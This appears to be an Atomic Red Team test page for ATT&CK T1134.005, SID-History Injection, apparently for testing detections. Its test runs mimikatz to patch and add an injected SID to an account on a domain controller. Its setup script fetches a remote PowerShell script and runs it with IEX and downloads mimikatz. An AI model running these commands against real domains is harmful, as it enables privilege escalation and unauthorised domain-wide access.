T1134.005
Access Token Manipulation: SID-History Injection
Description from ATT&CK
Adversaries may use SID-History Injection to escalate privileges and bypass access controls. The Windows security identifier (SID) is a unique value that identifies a user or group account. SIDs are used by Windows security in both security descriptors and access tokens. (Citation: Microsoft SID) An account can hold additional SIDs in the SID-History Active Directory attribute (Citation: Microsoft SID-History Attribute), allowing inter-operable account migration between domains (e.g., all values in SID-History are included in access tokens).
With Domain Administrator (or equivalent) rights, harvested or well-known SID values (Citation: Microsoft Well Known SIDs Jun 2017) may be inserted into SID-History to enable impersonation of arbitrary users/groups such as Enterprise Administrators. This manipulation may result in elevated access to local resources and/or access to otherwise inaccessible domains via lateral movement techniques such as Remote Services, SMB/Windows Admin Shares, or Windows Remote Management.
Atomic Tests
Atomic Test #1 - Injection SID-History with mimikatz
Adversaries may use SID-History Injection to escalate privileges and bypass access controls. Must be run on domain controller
Supported Platforms: windows
auto_generated_guid: 6bef32e5-9456-4072-8f14-35566fb85401
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| sid_to_inject | SID to inject into sidhistory | string | S-1-5-21-1004336348-1177238915-682003330-1134 |
| sam_account_name | Target account to modify | string | $env:username |
| mimikatz_path | Mimikatz windows executable | path | PathToAtomicsFolder..\ExternalPayloads\mimikatz\x64\mimikatz.exe |
Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)
1
2
#{mimikatz_path} "privilege::debug" "sid::patch" "sid::add /sid:#{sid_to_inject} /sam:#{sam_account_name}" "exit"
Cleanup Commands:
1
2
#{mimikatz_path} "sid::clear /sam:#{sam_account_name}" "exit"
Dependencies: Run with powershell!
Description: Mimikatz executor must exist on disk and at specified location (#{mimikatz_path})
Check Prereq Commands:
1
2
3
$mimikatz_path = cmd /c echo #{mimikatz_path}
if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
Get Prereq Commands:
1
2
3
4
5
6
7
8
9
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing)
$releases = "https://api.github.com/repos/gentilkiwi/mimikatz/releases"
$zipUrl = (Invoke-WebRequest $releases | ConvertFrom-Json)[0].assets.browser_download_url | where-object { $_.endswith(".zip") }
$mimikatz_exe = cmd /c echo #{mimikatz_path}
$basePath = Split-Path $mimikatz_exe | Split-Path
Invoke-FetchFromZip $zipUrl "x64/mimikatz.exe" $basePath